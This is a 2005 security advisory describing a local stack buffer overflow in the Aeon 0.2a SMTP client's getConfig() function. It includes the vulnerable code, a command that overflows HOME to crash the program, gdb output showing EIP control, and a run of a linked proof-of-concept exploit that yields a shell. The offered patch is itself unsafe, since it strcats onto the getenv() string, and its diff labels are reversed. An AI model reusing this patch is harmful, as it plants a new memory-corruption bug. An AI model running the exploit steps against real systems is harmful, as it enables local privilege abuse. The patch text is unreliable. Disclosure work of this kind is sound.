-------------------------------------------------
No System Group - Advisory #12 - 11/09/05
-------------------------------------------------
Program: Aeon
Homepage: http://www.abenetkiewicz.neostrada.pl/
Operating System: Linux and Unix-Compatible
Vulnerable Versions: Aeon v0.2a and prior
Risk: Low
Impact: Local Stack Buffer Overflow Vulnerability
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
Aeon is a small and simple smtp client. It can
be used as a replacement for sendmail, postfix
and other big, multi-purpouse mail transfer agents.
It works fine with mutt, pine and many other
console clients. Aeon has a very simple configuration
process which makes sending email as easy as never
before.

More informations at: http://www.abenetkiewicz.neostrada.pl/


- DETAILS
-------------------------------------------------
Exist a buffer overflow bug in the getConfig() function
of lib_aeon.c when is stored more than 512 bytes on the
HOME environmental variable. This may allow a local
command execution.

----------- lib_aeon.c ------------
13: /* reading rc file, handling missing options */
14: int getConfig(char settings[MAX_SETTINGS][MAX_LEN])
15: {
16:         char home[MAX_LEN];
17:         FILE *fp;                               /* .rc file handler */
18:         int numSet = 0;                         /* number of settings */
19: 
20:         strcpy(home, getenv("HOME"));           /* get home path */
21:         strcat(home, "/.aeonrc");               /* full path to rc file */
22:         fp = fopen(home, "r");
23:         if (fp == NULL) return -1;              /* no cfg - ERROR */
24:         while (fgets(settings[numSet], MAX_LEN-1, fp) && (numSet < MAX_SETTINGS
25:         fclose(fp);
26: 
27:         return numSet;
28: }
----------- lib_aeon.c ------------

Here we can look that don't check number of bytes
stored on HOME in 20 line of lib_aeon.c

We now will see what happened...

coki@coki:/home/coki/audit$ export HOME=`perl -e 'print "A" x 528'`
coki@coki:/home/coki/audit$ /usr/bin/sendmail
Segmentation fault (core dumped)
coki@coki:/home/coki/audit$ 

When is stored more than 512 bytes in HOME,
the buffer 'home' is overflowed.
We now will see what happen with 'gdb'.

coki@coki:/home/coki/audit$ gdb -c core
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux".
Core was generated by `/usr/bin/sendmail'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0x806d000        134664192
edx            0x1000   4096
ebx            0x4015cff4       1075171316
esp            0xbfffe2f0       0xbfffe2f0
ebp            0x41414141       0x41414141
esi            0xbffff37c       -1073745028
edi            0x1      1
eip            0x41414141       0x41414141
eflags         0x210246 2163270
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
(gdb) q
coki@coki:/home/coki/audit$

We can see that the EIP is overwritten with 0x41414141.

- EXPLOIT
-------------------------------------------------
I have written a Proof of Concept code exploit:

http://www.nosystem.com.ar/exploits/aeon_bof.c

coki@coki:~/audit$ ./aeon_bof /usr/bin/sendmail

 Aeon <= 0.2a local stack buffer overflow (Proof of Concept)
 by CoKi <coki@nosystem.com.ar>

sh-3.00$

/usr/bin/sendmail is not SUID by default :(


- SOLUTIONS
-------------------------------------------------
The patch is included here:

--- lib_aeon.c  2004-10-05 18:08:30.000000000 -0300
+++ lib_aeon.c.OLD      2005-09-11 01:34:08.000000000 -0300
@@ -12,11 +12,11 @@
 /* reading rc file, handling missing options */
 int getConfig(char settings[MAX_SETTINGS][MAX_LEN])
 {
-       char home[MAX_LEN];
+       char *home;
        FILE *fp;                               /* .rc file handler */
        int numSet = 0;                         /* number of settings */

-       strcpy(home, getenv("HOME"));           /* get home path */
+       home = getenv("HOME");                  /* get home path */
        strcat(home, "/.aeonrc");               /* full path to rc file */
        fp = fopen(home, "r");
        if (fp == NULL) return -1;              /* no cfg - ERROR */


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-12.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar
<!-- www.000webhost.com Analytics Code -->
<script type="text/javascript" src="http://analytics.hosting24.com/count.php"></script>
<noscript><a href="http://www.hosting24.com/"><img src="http://analytics.hosting24.com/count.php" alt="web hosting" /></a></noscript>
<!-- End Of Analytics Code -->